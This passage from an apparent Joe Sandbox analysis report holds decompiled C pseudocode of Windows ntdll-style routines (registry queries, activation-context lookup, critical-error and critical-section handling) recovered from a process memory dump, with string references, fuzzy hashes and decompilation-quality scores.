                                                                                                            					_push(3);
                                                                                                            					_push(_t59);
                                                                                                            					_push(0xffffffff);
                                                                                                            					if(E010A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                                            						_push(_t61);
                                                                                                            						E0112A80D(_t59, 1, _v20, 0);
                                                                                                            						_t88 = 4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t35 = E0112A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                                            				if(_t35 < 0) {
                                                                                                            					goto L14;
                                                                                                            				}
                                                                                                            				E01131293(_t79, _v40, E011307DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t48 = 0x7ffe0380;
                                                                                                            				} else {
                                                                                                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            				}
                                                                                                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                            					E0112138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                                            				}
                                                                                                            				goto L13;
                                                                                                            			}

















                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `
                                                                                                            • API String ID: 0-2679148245
                                                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                            • Instruction ID: 064aff933c36dfeb61cecee92b399a653899865deff67118fe3efb50a681d4d1
                                                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                            • Instruction Fuzzy Hash: 88311572304706ABE714DE29CC44F9B7BD9EBC8754F144229FA54EB288D770E914C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E010E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                            				char _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr* _v16;
                                                                                                            				char* _v20;
                                                                                                            				short _v22;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _t38;
                                                                                                            				short _t40;
                                                                                                            				short _t41;
                                                                                                            				void* _t44;
                                                                                                            				intOrPtr _t47;
                                                                                                            				void* _t48;
                                                                                                            
                                                                                                            				_v16 = __edx;
                                                                                                            				_t40 = 0x14;
                                                                                                            				_v24 = _t40;
                                                                                                            				_t41 = 0x16;
                                                                                                            				_v22 = _t41;
                                                                                                            				_t38 = 0;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_push( &_v8);
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push(2);
                                                                                                            				_t43 =  &_v24;
                                                                                                            				_v20 = L"BinaryName";
                                                                                                            				_push( &_v24);
                                                                                                            				_push(__ecx);
                                                                                                            				_t47 = 0;
                                                                                                            				_t48 = E010A9650();
                                                                                                            				if(_t48 >= 0) {
                                                                                                            					_t48 = 0xc000090b;
                                                                                                            				}
                                                                                                            				if(_t48 != 0xc0000023) {
                                                                                                            					_t44 = 0;
                                                                                                            					L13:
                                                                                                            					if(_t48 < 0) {
                                                                                                            						L16:
                                                                                                            						if(_t47 != 0) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                                            						}
                                                                                                            						L18:
                                                                                                            						return _t48;
                                                                                                            					}
                                                                                                            					 *_v16 = _t38;
                                                                                                            					 *_a4 = _t47;
                                                                                                            					goto L18;
                                                                                                            				}
                                                                                                            				_t47 = L01084620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                            				if(_t47 != 0) {
                                                                                                            					_push( &_v8);
                                                                                                            					_push(_v8);
                                                                                                            					_push(_t47);
                                                                                                            					_push(2);
                                                                                                            					_push( &_v24);
                                                                                                            					_push(_v12);
                                                                                                            					_t48 = E010A9650();
                                                                                                            					if(_t48 < 0) {
                                                                                                            						_t44 = 0;
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                                            						_t48 = 0xc000090b;
                                                                                                            					}
                                                                                                            					_t44 = 0;
                                                                                                            					if(_t48 < 0) {
                                                                                                            						goto L16;
                                                                                                            					} else {
                                                                                                            						_t17 = _t47 + 0xc; // 0xc
                                                                                                            						_t38 = _t17;
                                                                                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                                            							_t48 = 0xc000090b;
                                                                                                            						}
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t48 = _t48 + 0xfffffff4;
                                                                                                            				goto L18;
                                                                                                            			}

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: BinaryName
                                                                                                            • API String ID: 0-215506332
                                                                                                            • Opcode ID: a108b2244056ae32a5cb0c6a54d632f2404a3e1af03a2933f934dfadcf9b7cbc
                                                                                                            • Instruction ID: 7b9a3df7e74bdfc8535cfcb563b2968fd6893beeec0495d33fa3d4bc3bbd1319
                                                                                                            • Opcode Fuzzy Hash: a108b2244056ae32a5cb0c6a54d632f2404a3e1af03a2933f934dfadcf9b7cbc
                                                                                                            • Instruction Fuzzy Hash: 4931E872D0151ABFDB15DA5AC949EAFBFF4FF44720F024169E994AB250D7319E00C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 33%
                                                                                                            			E0109D294(void* __ecx, char __edx, void* __eflags) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v52;
                                                                                                            				signed int _v56;
                                                                                                            				signed int _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				char* _v68;
                                                                                                            				intOrPtr _v72;
                                                                                                            				char _v76;
                                                                                                            				signed int _v84;
                                                                                                            				intOrPtr _v88;
                                                                                                            				char _v92;
                                                                                                            				intOrPtr _v96;
                                                                                                            				intOrPtr _v100;
                                                                                                            				char _v104;
                                                                                                            				char _v105;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t35;
                                                                                                            				char _t38;
                                                                                                            				signed int _t40;
                                                                                                            				signed int _t44;
                                                                                                            				signed int _t52;
                                                                                                            				void* _t53;
                                                                                                            				void* _t55;
                                                                                                            				void* _t61;
                                                                                                            				intOrPtr _t62;
                                                                                                            				void* _t64;
                                                                                                            				signed int _t65;
                                                                                                            				signed int _t66;
                                                                                                            
                                                                                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                                            				_v8 =  *0x115d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                                            				_v105 = __edx;
                                                                                                            				_push( &_v92);
                                                                                                            				_t52 = 0;
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push( &_v104);
                                                                                                            				_push(0);
                                                                                                            				_t59 = __ecx;
                                                                                                            				_t55 = 2;
                                                                                                            				if(E01084120(_t55, __ecx) < 0) {
                                                                                                            					_t35 = 0;
                                                                                                            					L8:
                                                                                                            					_pop(_t61);
                                                                                                            					_pop(_t64);
                                                                                                            					_pop(_t53);
                                                                                                            					return E010AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                                            				}
                                                                                                            				_v96 = _v100;
                                                                                                            				_t38 = _v92;
                                                                                                            				if(_t38 != 0) {
                                                                                                            					_v104 = _t38;
                                                                                                            					_v100 = _v88;
                                                                                                            					_t40 = _v84;
                                                                                                            				} else {
                                                                                                            					_t40 = 0;
                                                                                                            				}
                                                                                                            				_v72 = _t40;
                                                                                                            				_v68 =  &_v104;
                                                                                                            				_push( &_v52);
                                                                                                            				_v76 = 0x18;
                                                                                                            				_push( &_v76);
                                                                                                            				_v64 = 0x40;
                                                                                                            				_v60 = _t52;
                                                                                                            				_v56 = _t52;
                                                                                                            				_t44 = E010A98D0();
                                                                                                            				_t62 = _v88;
                                                                                                            				_t65 = _t44;
                                                                                                            				if(_t62 != 0) {
                                                                                                            					asm("lock xadd [edi], eax");
                                                                                                            					if((_t44 | 0xffffffff) != 0) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                                            					E010A95D0();
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                                            					goto L4;
                                                                                                            				} else {
                                                                                                            					L4:
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                                            					if(_t65 >= 0) {
                                                                                                            						_t52 = 1;
                                                                                                            					} else {
                                                                                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t35 = _t52;
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x0109d37d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010daffe
                                                                                                            0x010db001
                                                                                                            0x010db011
                                                                                                            0x00000000
                                                                                                            0x0109d322
                                                                                                            0x0109d322
                                                                                                            0x0109d330
                                                                                                            0x0109d337
                                                                                                            0x0109d35d
                                                                                                            0x0109d339
                                                                                                            0x0109d33f
                                                                                                            0x0109d38c
                                                                                                            0x0109d38c
                                                                                                            0x0109d33f
                                                                                                            0x0109d349
                                                                                                            0x00000000
                                                                                                            0x0109d349

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 94d5208b208f9e41fda9476f53126fb05aed287154358485caa85f20ae425f87
                                                                                                            • Instruction ID: c470122084e117f0cc4025ed147bf1958eec43835e4d9bea7e9293e5af2a668b
                                                                                                            • Opcode Fuzzy Hash: 94d5208b208f9e41fda9476f53126fb05aed287154358485caa85f20ae425f87
                                                                                                            • Instruction Fuzzy Hash: FD31D1B15483019FCB51DFA8C8909AFBBE8FB95654F00892EF9D483210D634DD04DB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E01071B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v16;
                                                                                                            				intOrPtr* _t26;
                                                                                                            				intOrPtr _t29;
                                                                                                            				void* _t30;
                                                                                                            				signed int _t31;
                                                                                                            
                                                                                                            				_t27 = __ecx;
                                                                                                            				_t29 = __edx;
                                                                                                            				_t31 = 0;
                                                                                                            				_v8 = __edx;
                                                                                                            				if(__edx == 0) {
                                                                                                            					L18:
                                                                                                            					_t30 = 0xc000000d;
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					_t26 = _a4;
                                                                                                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                                            						goto L18;
                                                                                                            					} else {
                                                                                                            						E010ABB40(__ecx,  &_v16, __ecx);
                                                                                                            						_push(_t26);
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t29);
                                                                                                            						_push( &_v16);
                                                                                                            						_t30 = E010AA9B0();
                                                                                                            						if(_t30 >= 0) {
                                                                                                            							_t19 =  *_t26;
                                                                                                            							if( *_t26 != 0) {
                                                                                                            								goto L7;
                                                                                                            							} else {
                                                                                                            								 *_a8 =  *_a8 & 0;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							if(_t30 != 0xc0000023) {
                                                                                                            								L9:
                                                                                                            								_push(_t26);
                                                                                                            								_push( *_t26);
                                                                                                            								_push(_t31);
                                                                                                            								_push(_v8);
                                                                                                            								_push( &_v16);
                                                                                                            								_t30 = E010AA9B0();
                                                                                                            								if(_t30 < 0) {
                                                                                                            									L12:
                                                                                                            									if(_t31 != 0) {
                                                                                                            										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									 *_a8 = _t31;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t19 =  *_t26;
                                                                                                            								if( *_t26 == 0) {
                                                                                                            									_t31 = 0;
                                                                                                            								} else {
                                                                                                            									L7:
                                                                                                            									_t31 = L01084620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                                            								}
                                                                                                            								if(_t31 == 0) {
                                                                                                            									_t30 = 0xc0000017;
                                                                                                            								} else {
                                                                                                            									goto L9;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t30;
                                                                                                            			}










                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: WindowsExcludedProcs
                                                                                                            • API String ID: 0-3583428290
                                                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                            • Instruction ID: f35841772cb50a7d3e6543180696fc8fd8c3dd5d7d60f860cbf0bd4247c94047
                                                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                            • Instruction Fuzzy Hash: E2210A3790012DEBDB629AD9C840FAF7BEDEF44A50F154465FE949B240D630DD00DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0108F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                            				intOrPtr _t13;
                                                                                                            				intOrPtr _t14;
                                                                                                            				signed int _t16;
                                                                                                            				signed char _t17;
                                                                                                            				intOrPtr _t19;
                                                                                                            				intOrPtr _t21;
                                                                                                            				intOrPtr _t23;
                                                                                                            				intOrPtr* _t25;
                                                                                                            
                                                                                                            				_t25 = _a8;
                                                                                                            				_t17 = __ecx;
                                                                                                            				if(_t25 == 0) {
                                                                                                            					_t19 = 0xc00000f2;
                                                                                                            					L8:
                                                                                                            					return _t19;
                                                                                                            				}
                                                                                                            				if((__ecx & 0xfffffffe) != 0) {
                                                                                                            					_t19 = 0xc00000ef;
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				_t19 = 0;
                                                                                                            				 *_t25 = 0;
                                                                                                            				_t21 = 0;
                                                                                                            				_t23 = "Actx ";
                                                                                                            				if(__edx != 0) {
                                                                                                            					if(__edx == 0xfffffffc) {
                                                                                                            						L21:
                                                                                                            						_t21 = 0x200;
                                                                                                            						L5:
                                                                                                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                                            						 *_t25 = _t13;
                                                                                                            						L6:
                                                                                                            						if(_t13 == 0) {
                                                                                                            							if((_t17 & 0x00000001) != 0) {
                                                                                                            								 *_t25 = _t23;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L7:
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					if(__edx == 0xfffffffd) {
                                                                                                            						 *_t25 = _t23;
                                                                                                            						_t13 = _t23;
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                                            					 *_t25 = _t13;
                                                                                                            					L14:
                                                                                                            					if(_t21 == 0) {
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            				_t14 = _a4;
                                                                                                            				if(_t14 != 0) {
                                                                                                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                                            					if(_t16 <= 1) {
                                                                                                            						_t21 = 0x1f8;
                                                                                                            						_t13 = 0;
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            					if(_t16 == 2) {
                                                                                                            						goto L21;
                                                                                                            					}
                                                                                                            					if(_t16 != 4) {
                                                                                                            						_t19 = 0xc00000f0;
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					_t13 = 0;
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t21 = 0x1f8;
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            			}












                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Actx
                                                                                                            • API String ID: 0-89312691
                                                                                                            • Opcode ID: 08aa6a6000ac9e51c06a850526177b0cb268e137d492f2f76d05c612d4b68b4a
                                                                                                            • Instruction ID: 2fab502ba58bab25cf2ed97983d8067bfd4d897f586d5f78d607d6a7c85b5c24
                                                                                                            • Opcode Fuzzy Hash: 08aa6a6000ac9e51c06a850526177b0cb268e137d492f2f76d05c612d4b68b4a
                                                                                                            • Instruction Fuzzy Hash: FA11B23570CB038BFB657E3D889073A76D5BB96664F25467AE5E1CB391DB74C8408340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E01118DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t35;
                                                                                                            				void* _t41;
                                                                                                            
                                                                                                            				_t40 = __esi;
                                                                                                            				_t39 = __edi;
                                                                                                            				_t38 = __edx;
                                                                                                            				_t35 = __ecx;
                                                                                                            				_t34 = __ebx;
                                                                                                            				_push(0x74);
                                                                                                            				_push(0x1140d50);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                                            					E010F5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                            						asm("int3");
                                                                                                            						 *(_t41 - 4) = 0xfffffffe;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *(_t41 - 4) = 1;
                                                                                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                                            				 *((intOrPtr*)(_t41 - 0x64)) = L010BDEF0;
                                                                                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                                            				_push(_t41 - 0x70);
                                                                                                            				L010BDEF0(1, _t38);
                                                                                                            				 *(_t41 - 4) = 0xfffffffe;
                                                                                                            				return E010BD130(_t34, _t39, _t40);
                                                                                                            			}






                                                                                                            Strings
                                                                                                            • Critical error detected %lx, xrefs: 01118E21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Critical error detected %lx
                                                                                                            • API String ID: 0-802127002
                                                                                                            • Opcode ID: fa0bcb52dbaf0aa495cd694bd481543c5a782e64d18c7b8010d2d6c54a38d22e
                                                                                                            • Instruction ID: 0ae01cae8939a9ef7884e39b9b87d31f8be8b0fea955ad88205492c66325e364
                                                                                                            • Opcode Fuzzy Hash: fa0bcb52dbaf0aa495cd694bd481543c5a782e64d18c7b8010d2d6c54a38d22e
                                                                                                            • Instruction Fuzzy Hash: BC118771D15348EBEF28DFA889057DDFBB0BB04314F20822EE5A8AB282C3300602CF14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 010FFF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                            • API String ID: 0-1911121157
                                                                                                            • Opcode ID: ffc7c55bdf48ccdb4caf20c0169a7bde686f37056cd618b92e9bb22ac30ae94c
                                                                                                            • Instruction ID: 05e5d2dcbcc8591e1671a2acb3849fb822bb756f81ed996346a14bb10aac84bd
                                                                                                            • Opcode Fuzzy Hash: ffc7c55bdf48ccdb4caf20c0169a7bde686f37056cd618b92e9bb22ac30ae94c
                                                                                                            • Instruction Fuzzy Hash: 3E114472910246EFDB66EB54C88AFDCBBF1FF08708F108098F2486B5A1C7389944CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 88%
                                                                                                            			E01135BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				signed int _t296;
                                                                                                            				signed char _t298;
                                                                                                            				signed int _t301;
                                                                                                            				signed int _t306;
                                                                                                            				signed int _t310;
                                                                                                            				signed char _t311;
                                                                                                            				intOrPtr _t312;
                                                                                                            				signed int _t313;
                                                                                                            				void* _t327;
                                                                                                            				signed int _t328;
                                                                                                            				intOrPtr _t329;
                                                                                                            				intOrPtr _t333;
                                                                                                            				signed char _t334;
                                                                                                            				signed int _t336;
                                                                                                            				void* _t339;
                                                                                                            				signed int _t340;
                                                                                                            				signed int _t356;
                                                                                                            				signed int _t362;
                                                                                                            				short _t367;
                                                                                                            				short _t368;
                                                                                                            				short _t373;
                                                                                                            				signed int _t380;
                                                                                                            				void* _t382;
                                                                                                            				short _t385;
                                                                                                            				signed short _t392;
                                                                                                            				signed char _t393;
                                                                                                            				signed int _t395;
                                                                                                            				signed char _t397;
                                                                                                            				signed int _t398;
                                                                                                            				signed short _t402;
                                                                                                            				void* _t406;
                                                                                                            				signed int _t412;
                                                                                                            				signed char _t414;
                                                                                                            				signed short _t416;
                                                                                                            				signed int _t421;
                                                                                                            				signed char _t427;
                                                                                                            				intOrPtr _t434;
                                                                                                            				signed char _t435;
                                                                                                            				signed int _t436;
                                                                                                            				signed int _t442;
                                                                                                            				signed int _t446;
                                                                                                            				signed int _t447;
                                                                                                            				signed int _t451;
                                                                                                            				signed int _t453;
                                                                                                            				signed int _t454;
                                                                                                            				signed int _t455;
                                                                                                            				intOrPtr _t456;
                                                                                                            				intOrPtr* _t457;
                                                                                                            				short _t458;
                                                                                                            				signed short _t462;
                                                                                                            				signed int _t469;
                                                                                                            				intOrPtr* _t474;
                                                                                                            				signed int _t475;
                                                                                                            				signed int _t479;
                                                                                                            				signed int _t480;
                                                                                                            				signed int _t481;
                                                                                                            				short _t485;
                                                                                                            				signed int _t491;
                                                                                                            				signed int* _t494;
                                                                                                            				signed int _t498;
                                                                                                            				signed int _t505;
                                                                                                            				intOrPtr _t506;
                                                                                                            				signed short _t508;
                                                                                                            				signed int _t511;
                                                                                                            				void* _t517;
                                                                                                            				signed int _t519;
                                                                                                            				signed int _t522;
                                                                                                            				void* _t523;
                                                                                                            				signed int _t524;
                                                                                                            				void* _t528;
                                                                                                            				signed int _t529;
                                                                                                            
                                                                                                            				_push(0xd4);
                                                                                                            				_push(0x1141178);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				_t494 = __edx;
                                                                                                            				 *(_t528 - 0xcc) = __edx;
                                                                                                            				_t511 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                                            				 *(_t528 - 0xbc) = __ecx;
                                                                                                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                                            				_t427 = 0;
                                                                                                            				 *(_t528 - 0x74) = 0;
                                                                                                            				 *(_t528 - 0x9c) = 0;
                                                                                                            				 *(_t528 - 0x84) = 0;
                                                                                                            				 *(_t528 - 0xac) = 0;
                                                                                                            				 *(_t528 - 0x88) = 0;
                                                                                                            				 *(_t528 - 0xa8) = 0;
                                                                                                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                                            				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						_t421 = E01134C56(0, __edx, __ecx, __eflags);
                                                                                                            						__eflags = _t421;
                                                                                                            						if(_t421 != 0) {
                                                                                                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                                            							E010AD000(0x410);
                                                                                                            							 *(_t528 - 0x18) = _t529;
                                                                                                            							 *(_t528 - 0x9c) = _t529;
                                                                                                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                                            							E01135542(_t528 - 0x9c, _t528 - 0x84);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t435 = _t427;
                                                                                                            					 *(_t528 - 0xd0) = _t435;
                                                                                                            					_t474 = _t511 + 0x65;
                                                                                                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                            					_t511 = 0x18;
                                                                                                            					while(1) {
                                                                                                            						 *(_t528 - 0xa0) = _t427;
                                                                                                            						 *(_t528 - 0xbc) = _t427;
                                                                                                            						 *(_t528 - 0x80) = _t427;
                                                                                                            						 *(_t528 - 0x78) = 0x50;
                                                                                                            						 *(_t528 - 0x79) = _t427;
                                                                                                            						 *(_t528 - 0x7a) = _t427;
                                                                                                            						 *(_t528 - 0x8c) = _t427;
                                                                                                            						 *(_t528 - 0x98) = _t427;
                                                                                                            						 *(_t528 - 0x90) = _t427;
                                                                                                            						 *(_t528 - 0xb0) = _t427;
                                                                                                            						 *(_t528 - 0xb8) = _t427;
                                                                                                            						_t296 = 1 << _t435;
                                                                                                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                                            						__eflags = _t436 & _t296;
                                                                                                            						if((_t436 & _t296) != 0) {
                                                                                                            							goto L92;
                                                                                                            						}
                                                                                                            						__eflags =  *((char*)(_t474 - 1));
                                                                                                            						if( *((char*)(_t474 - 1)) == 0) {
                                                                                                            							goto L92;
                                                                                                            						}
                                                                                                            						_t301 =  *_t474;
                                                                                                            						__eflags = _t494[1] - _t301;
                                                                                                            						if(_t494[1] <= _t301) {
                                                                                                            							L10:
                                                                                                            							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                                            								L12:
                                                                                                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                                            									goto L92;
                                                                                                            								}
                                                                                                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                                            									goto L92;
                                                                                                            								}
                                                                                                            								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                                            								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                                            									goto L92;
                                                                                                            								}
                                                                                                            								L15:
                                                                                                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                                            								 *(_t528 - 0xc0) = _t306;
